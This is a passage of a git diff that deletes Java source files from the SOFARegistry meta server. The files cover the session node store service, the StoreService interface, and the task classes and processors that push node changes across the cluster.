sessionRepositoryService.getAllData(); - map.forEach((key, value) -> { - if (value.isExpired()) { - reNewerList.add(value.getRenewal()); - } - }); - } finally { - read.unlock(); - } - return reNewerList; - } - - @Override - public Map getNodes() { - Map tmpMap = new HashMap<>(); - read.lock(); - try { - Map> map = sessionRepositoryService.getAllData(); - map.forEach((key, value) -> tmpMap.put(key, value.getRenewal())); - } finally { - read.unlock(); - } - - return tmpMap; - } - - @Override - public void pushNodeListChange() { - NodeOperator fireNode; - if ((fireNode = sessionConfirmStatusService.peekConfirmNode()) != null) { - //if (LOGGER.isDebugEnabled()) { - LOGGER.info("Now:type {},node {},Push queue:{}", fireNode.getNodeOperate(), fireNode - .getNode().getNodeUrl().getIpAddress(), - sessionConfirmStatusService.getAllConfirmNodes()); - //} - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - Map> map = nodeChangeResult.getNodes(); - Map addNodes = map.get(nodeConfig.getLocalDataCenter()); - if (addNodes != null) { - LOGGER.info("addNodes:{}", addNodes.keySet()); - Map previousNodes = sessionConfirmStatusService - .putExpectNodes(fireNode.getNode(), addNodes); - - if (!previousNodes.isEmpty()) { - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("push Type:{},peek:{},list{}", fireNode.getNodeOperate(), - fireNode.getNode().getNodeUrl().getIpAddress(), previousNodes.keySet()); - } - firePushSessionListTask(fireNode, previousNodes, nodeChangeResult); - } - } - } - } - - @Override - public void confirmNodeStatus(String ipAddress, String confirmNodeIp) { - NodeOperator fireNode = sessionConfirmStatusService.peekConfirmNode(); - if (fireNode != null) { - String fireNodeIp = fireNode.getNode().getNodeUrl().getIpAddress(); - if (fireNodeIp != null && !fireNodeIp.equals(confirmNodeIp)) { - LOGGER - .info( - "Confirm node already be remove from queue!Receive ip:{},expect confirm ip:{},now peek ip:{}", - ipAddress, confirmNodeIp, fireNodeIp); - return; - } - Map waitNotifyNodes = sessionConfirmStatusService - .getExpectNodes(fireNode.getNode()); - if (waitNotifyNodes != null) { - LOGGER.info("Peek node:{} oper:{},waitNotifyNodes:{},confirm ip:{}", fireNode - .getNode().getNodeUrl().getIpAddress(), fireNode.getNodeOperate(), - waitNotifyNodes.keySet(), ipAddress); - - Set removeIp = getRemoveIp(waitNotifyNodes.keySet()); - removeIp.add(ipAddress); - - waitNotifyNodes = sessionConfirmStatusService.removeExpectConfirmNodes( - fireNode.getNode(), removeIp); - - if (waitNotifyNodes.isEmpty()) { - //all node be notified,or some disconnect node be evict - try { - if (null != sessionConfirmStatusService - .removeExpectNodes(sessionConfirmStatusService.pollConfirmNode() - .getNode())) { - //add init status must notify - LOGGER.info("Session node {} operator {} confirm!", fireNode.getNode() - .getNodeUrl().getIpAddress(), fireNode.getNodeOperate()); - } - } catch (InterruptedException e) { - LOGGER.error("Notify expect confirm status node " + fireNode.getNode() - + " interrupted!", e); - } - } - } else { - try { - //wait node not exist, - sessionConfirmStatusService.pollConfirmNode(); - LOGGER - .info( - "Session node {} operator {} poll!not other node need be notify!Confirm ip {}", - fireNode.getNode().getNodeUrl().getIpAddress(), - fireNode.getNodeOperate(), ipAddress); - } catch (InterruptedException e) { - LOGGER.error("Notify expect confirm status node " + fireNode.getNode() - + " interrupted!", e); - } - } - } - - } - - private Set getRemoveIp(Set waitNotifyNodes) { - - NodeChangeResult nodeChangeResult = getNodeChangeResult(); - Map> map = nodeChangeResult.getNodes(); - Map addNodes = map.get(nodeConfig.getLocalDataCenter()); - if (addNodes != null && !addNodes.isEmpty()) { - return waitNotifyNodes.stream().filter(ip -> !addNodes.keySet().contains(ip)).collect(Collectors.toSet()); - } - return new HashSet<>(); - } - - private void firePushSessionListTask(NodeOperator fireNode, - Map sessionNodeMap, - NodeChangeResult nodeChangeResult) { - - //notify target session node registry - TaskEvent taskEvent = new TaskEvent(TaskType.SESSION_NODE_CHANGE_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_TARGET_OPERATOR_TYPE, fireNode.getNodeOperate()); - taskEvent.setAttribute(Constant.PUSH_TARGET_SESSION_NODE, sessionNodeMap); - taskEvent.setAttribute(Constant.PUSH_TARGET_CONFIRM_NODE, fireNode.getNode().getNodeUrl() - .getIpAddress()); - taskEvent.setEventObj(nodeChangeResult); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:" + taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public NodeChangeResult getNodeChangeResult() { - - NodeChangeResult nodeChangeResult = new NodeChangeResult(NodeType.SESSION); - - //one session node cluster - String localDataCenter = nodeConfig.getLocalDataCenter(); - nodeChangeResult.setLocalDataCenter(localDataCenter); - - Map> nodes = new HashMap<>(); - read.lock(); - try { - Map tmpMap = new HashMap<>(); - Map> map = sessionRepositoryService.getAllData(); - map.forEach((key, value) -> tmpMap.put(key, value.getRenewal())); - nodes.put(localDataCenter, tmpMap); - - nodeChangeResult.setNodes(nodes); - nodeChangeResult.setVersion(sessionVersionRepositoryService.getVersion(nodeConfig.getLocalDataCenter())); - } finally { - read.unlock(); - } - return nodeChangeResult; - } - - @Override - public void getOtherDataCenterNodeAndUpdate() { - - } - - @Override - public DataCenterNodes getDataCenterNodes() { - Long version = sessionVersionRepositoryService.getVersion(nodeConfig.getLocalDataCenter()); - DataCenterNodes dataCenterNodes = new DataCenterNodes(NodeType.SESSION, version, - nodeConfig.getLocalDataCenter()); - dataCenterNodes.setNodes(getNodes()); - return dataCenterNodes; - } - - @Override - public void updateOtherDataCenterNodes(DataCenterNodes dataCenterNodes) { - throw new NotSupportedException("Node type SESSION not support function"); - } - - /** - * Setter method for property taskListenerManager. - * - * @param taskListenerManager value to be assigned to property taskListenerManager - */ - public void setTaskListenerManager(TaskListenerManager taskListenerManager) { - this.taskListenerManager = taskListenerManager; - } - - /** - * Setter method for property dataStoreService. - * - * @param dataStoreService value to be assigned to property dataStoreService - */ - public void setDataStoreService(StoreService dataStoreService) { - this.dataStoreService = dataStoreService; - } - - /** - * Setter method for property nodeConfig. - * - * @param nodeConfig value to be assigned to property nodeConfig - */ - public void setNodeConfig(NodeConfig nodeConfig) { - this.nodeConfig = nodeConfig; - } - - /** - * Setter method for property sessionRepositoryService. - * - * @param sessionRepositoryService value to be assigned to property sessionRepositoryService - */ - public void setSessionRepositoryService(RepositoryService> sessionRepositoryService) { - this.sessionRepositoryService = sessionRepositoryService; - } - - /** - * Setter method for property sessionVersionRepositoryService. - * - * @param sessionVersionRepositoryService value to be assigned to property sessionVersionRepositoryService - */ - public void setSessionVersionRepositoryService(VersionRepositoryService sessionVersionRepositoryService) { - this.sessionVersionRepositoryService = sessionVersionRepositoryService; - } - - /** - * Getter method for property sessionConfirmStatusService. - * - * @return property value of sessionConfirmStatusService - */ - public NodeConfirmStatusService getSessionConfirmStatusService() { - return sessionConfirmStatusService; - } - - /** - * Setter method for property sessionConfirmStatusService. - * - * @param sessionConfirmStatusService value to be assigned to property sessionConfirmStatusService - */ - public void setSessionConfirmStatusService(NodeConfirmStatusService sessionConfirmStatusService) { - this.sessionConfirmStatusService = sessionConfirmStatusService; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/StoreService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/StoreService.java deleted file mode 100644 index 05d38de1b..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/StoreService.java +++ /dev/null @@ -1,118 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.store; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; - -import java.util.Collection; -import java.util.List; -import java.util.Map; - -/** - * interface for node store service - * @author shangyu.wh - * @version $Id: StoreService.java, v 0.1 2018-01-11 22:16 shangyu.wh Exp $ - */ -public interface StoreService { - - /** - * get node type - * @return - */ - NodeType getNodeType(); - - NodeChangeResult setNodes(List nodes); - - /** - * add new node,when renew request not found node will be add again - * @param node - * @return - */ - NodeChangeResult addNode(T node); - - /** - * node change info push must be confirm received, - * @param ipAddress received Node ipAddress - * @param confirmNodeIp will be confirmed node ip - */ - void confirmNodeStatus(String ipAddress, String confirmNodeIp); - - /** - * remove current dataCenter dataNode by ipAddress - * @param ipAddress - * @return - */ - boolean removeNode(String ipAddress); - - /** - * remove current dataCenter dataNodes - * @param nodes - */ - void removeNodes(Collection nodes); - - /** - * heartbeat update node expired time - * @param node - * @return - */ - void reNew(T node, int duration); - - /** - * get expired node list - * @return - */ - Collection getExpired(); - - /** - * get all Nodes from all dataCenter - * @return - */ - Map getNodes(); - - /** - * get node info request - * @return - */ - NodeChangeResult getNodeChangeResult(); - - /** - * schedule check other dataCenter node change and update - */ - void getOtherDataCenterNodeAndUpdate(); - - /** - * get other meta server node change update version and node info,and push current dataCenter node change info - * - * @param dataCenterNodes - */ - void updateOtherDataCenterNodes(DataCenterNodes dataCenterNodes); - - /** - * get DataCenter Nodes list contains version - * @return - */ - DataCenterNodes getDataCenterNodes(); - - /** - * push node change result - */ - void pushNodeListChange(); - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/AbstractMetaServerTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/AbstractMetaServerTask.java deleted file mode 100644 index 0bd945001..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/AbstractMetaServerTask.java +++ /dev/null @@ -1,65 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.task.Retryable; - -import java.util.UUID; -import java.util.concurrent.atomic.AtomicInteger; - -/** - * - * @author shangyu.wh - * @version $Id: AbstractMetaServerTask.java, v 0.1 2018-01-15 16:10 shangyu.wh Exp $ - */ -public abstract class AbstractMetaServerTask implements MetaServerTask, Retryable { - - private final static Logger LOGGER = LoggerFactory.getLogger(AbstractMetaServerTask.class, - "[Task]"); - - protected volatile String taskId; - - private AtomicInteger execCount = new AtomicInteger(1); - - @Override - public synchronized String getTaskId() { - if (taskId == null) { - taskId = UUID.randomUUID().toString(); - } - - return taskId; - } - - @Override - public long getExpiryTime() { - return -1; - } - - protected boolean checkRetryTimes(int configTimes) { - if (configTimes > 0) { - if (execCount.incrementAndGet() > configTimes) { - LOGGER.info("retry times more than {},info:{}", configTimes, this); - return false; - } else { - return true; - } - } - return false; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/Constant.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/Constant.java deleted file mode 100644 index 52278f3b2..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/Constant.java +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -/** - * - * @author shangyu.wh - * @version $Id: Constant.java, v 0.1 2018-03-28 14:10 shangyu.wh Exp $ - */ -public class Constant { - - public final static String PUSH_NEED_CONFIRM_KEY = "NEED_CONFIRM"; - - public final static String PUSH_TARGET_DATA_NODE = "PUSH_TARGET_DATA_NODE"; - - public final static String PUSH_TARGET_SESSION_NODE = "PUSH_TARGET_SESSION_NODE"; - - public final static String PUSH_TARGET_TYPE = "PUSH_TARGET_TYPE"; - - public final static String PUSH_TARGET_OPERATOR_TYPE = "PUSH_TARGET_OPERATOR_TYPE"; - - public final static String PUSH_TARGET_CONFIRM_NODE = "PUSH_TARGET_CONFIRM_NODE"; -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/DataNodeChangePushTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/DataNodeChangePushTask.java deleted file mode 100644 index db0900c0e..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/DataNodeChangePushTask.java +++ /dev/null @@ -1,105 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.DataNodeService; -import com.alipay.sofa.registry.server.meta.node.SessionNodeService; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.Map; - -/** - * node info change according local or other dataCenter,push change info to local dataCenter node - * - * @author shangyu.wh - * @version $Id: DataNodeChangePushTask.java, v 0.1 2018-01-23 19:05 shangyu.wh Exp $ - */ -public class DataNodeChangePushTask extends AbstractMetaServerTask { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeChangePushTask.class, - "[Task]"); - private final SessionNodeService sessionNodeService; - private final DataNodeService dataNodeService; - final private MetaServerConfig metaServerConfig; - final private NodeType nodeType; - private NodeChangeResult nodeChangeResult; - private Boolean confirm; - private String confirmNodeIp; - - private Map targetNodes; - - public DataNodeChangePushTask(NodeType nodeType, MetaServerConfig metaServerConfig) { - this.metaServerConfig = metaServerConfig; - this.nodeType = nodeType; - this.sessionNodeService = (SessionNodeService) ServiceFactory - .getNodeService(NodeType.SESSION); - this.dataNodeService = (DataNodeService) ServiceFactory.getNodeService(NodeType.DATA); - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - - confirm = (Boolean) taskEvent.getAttribute(Constant.PUSH_NEED_CONFIRM_KEY); - targetNodes = (Map) taskEvent - .getAttribute(Constant.PUSH_TARGET_DATA_NODE); - - confirmNodeIp = (String) taskEvent.getAttribute(Constant.PUSH_TARGET_CONFIRM_NODE); - - Object obj = taskEvent.getEventObj(); - if (obj instanceof NodeChangeResult) { - nodeChangeResult = (NodeChangeResult) obj; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - @Override - public void execute() { - switch (nodeType) { - case SESSION: - sessionNodeService.pushDataNodes(nodeChangeResult); - LOGGER.info("push change to Session Nodes!"); - break; - case DATA: - dataNodeService - .pushDataNodes(nodeChangeResult, targetNodes, confirm, confirmNodeIp); - LOGGER.info("push change to Data Nodes!"); - break; - default: - break; - } - - } - - @Override - public String toString() { - return "DATA_NODE_CHANGE_PUSH_TASK {" + "taskId='" + taskId + '\'' + ", nodeType='" - + nodeType + '\'' + ", nodeChangeRequest=" + nodeChangeResult + '}'; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(metaServerConfig.getDataNodeChangePushTaskRetryTimes()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/MetaServerTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/MetaServerTask.java deleted file mode 100644 index 7713622f6..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/MetaServerTask.java +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.task.Task; - -/** - * - * @author shangyu.wh - * @version $Id: MataServerTask.java, v 0.1 2018-01-15 15:27 shangyu.wh Exp $ - */ -public interface MetaServerTask extends Task { - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/PersistenceDataChangeNotifyTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/PersistenceDataChangeNotifyTask.java deleted file mode 100644 index 63d986fcc..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/PersistenceDataChangeNotifyTask.java +++ /dev/null @@ -1,70 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.SessionNodeService; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeChangePushTask.java, v 0.1 2018-01-15 16:12 shangyu.wh Exp $ - */ -public class PersistenceDataChangeNotifyTask extends AbstractMetaServerTask { - - private final SessionNodeService sessionNodeService; - - final private MetaServerConfig metaServerConfig; - - private NotifyProvideDataChange notifyProvideDataChange; - - public PersistenceDataChangeNotifyTask(MetaServerConfig metaServerConfig) { - this.metaServerConfig = metaServerConfig; - this.sessionNodeService = (SessionNodeService) ServiceFactory - .getNodeService(NodeType.SESSION); - } - - @Override - public void execute() { - sessionNodeService.notifyProvideDataChange(notifyProvideDataChange); - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - if (obj instanceof NotifyProvideDataChange) { - this.notifyProvideDataChange = (NotifyProvideDataChange) obj; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - @Override - public String toString() { - return "PERSISTENCE_DATA_CHANGE_NOTIFY_TASK{" + "taskId='" + taskId + '\'' - + ", notifyProvideDataChange=" + notifyProvideDataChange + '}'; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(metaServerConfig.getSessionNodeChangePushTaskRetryTimes()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/ReceiveStatusConfirmNotifyTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/ReceiveStatusConfirmNotifyTask.java deleted file mode 100644 index 1b2494953..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/ReceiveStatusConfirmNotifyTask.java +++ /dev/null @@ -1,70 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.StatusConfirmRequest; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.node.DataNodeService; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -/** - * - * @author shangyu.wh - * @version $Id: ReceiveStatusConfirmNotifyTask.java, v 0.1 2018-03-24 17:08 shangyu.wh Exp $ - */ -public class ReceiveStatusConfirmNotifyTask extends AbstractMetaServerTask { - - private final DataNodeService dataNodeService; - final private MetaServerConfig metaServerConfig; - private DataNode dataNode; - - public ReceiveStatusConfirmNotifyTask(DataNodeService dataNodeService, - MetaServerConfig metaServerConfig) { - this.dataNodeService = dataNodeService; - this.metaServerConfig = metaServerConfig; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (obj instanceof DataNode) { - this.dataNode = (DataNode) obj; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - @Override - public void execute() { - StatusConfirmRequest statusConfirmRequest = new StatusConfirmRequest(dataNode, - dataNode.getNodeStatus()); - dataNodeService.notifyStatusConfirm(statusConfirmRequest); - } - - @Override - public String toString() { - return "RECEIVE_STATUS_CONFIRM_NOTIFY_TASK{" + "taskId='" + taskId + '\'' + ", dataNode=" - + dataNode + '}'; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(metaServerConfig.getReceiveStatusConfirmNotifyTaskRetryTimes()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/SessionNodeChangePushTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/SessionNodeChangePushTask.java deleted file mode 100644 index 8bf195c4c..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/SessionNodeChangePushTask.java +++ /dev/null @@ -1,77 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.SessionNodeService; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeChangePushTask.java, v 0.1 2018-01-15 16:12 shangyu.wh Exp $ - */ -public class SessionNodeChangePushTask extends AbstractMetaServerTask { - - private final SessionNodeService sessionNodeService; - final private MetaServerConfig metaServerConfig; - private NodeChangeResult nodeChangeResult; - private Map targetNodes; - private String confirmNodeIp; - - public SessionNodeChangePushTask(MetaServerConfig metaServerConfig) { - this.metaServerConfig = metaServerConfig; - this.sessionNodeService = (SessionNodeService) ServiceFactory - .getNodeService(NodeType.SESSION); - } - - @Override - public void execute() { - sessionNodeService.pushSessions(nodeChangeResult, targetNodes, confirmNodeIp); - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - targetNodes = (Map) taskEvent - .getAttribute(Constant.PUSH_TARGET_SESSION_NODE); - - confirmNodeIp = (String) taskEvent.getAttribute(Constant.PUSH_TARGET_CONFIRM_NODE); - Object obj = taskEvent.getEventObj(); - if (obj instanceof NodeChangeResult) { - this.nodeChangeResult = (NodeChangeResult) obj; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - @Override - public String toString() { - return "SESSION_NODE_CHANGE_PUSH_TASK{" + "taskId='" + taskId + '\'' - + ", nodeChangeResult=" + nodeChangeResult + '}'; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(metaServerConfig.getSessionNodeChangePushTaskRetryTimes()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/DataNodeSingleTaskProcessor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/DataNodeSingleTaskProcessor.java deleted file mode 100644 index 2715c0917..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/DataNodeSingleTaskProcessor.java +++ /dev/null @@ -1,60 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task.processor; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeSingleTaskProcessor.java, v 0.1 2017-12-11 19:35 shangyu.wh Exp $ - */ -public class DataNodeSingleTaskProcessor implements TaskProcessor { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeSingleTaskProcessor.class, - "[Task]"); - - @Override - public ProcessingResult process(MetaServerTask task) { - try { - LOGGER.info("execute " + task); - task.execute(); - LOGGER.info("end " + task); - return ProcessingResult.Success; - } catch (Throwable throwable) { - LOGGER.error("Data node SingleTask Process error!", throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } - - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/MetaNodeSingleTaskProcessor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/MetaNodeSingleTaskProcessor.java deleted file mode 100644 index 8d6ec5d6c..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/MetaNodeSingleTaskProcessor.java +++ /dev/null @@ -1,60 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task.processor; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: ClientNodeSingleTaskProcessor.java, v 0.1 2017-12-11 19:47 shangyu.wh 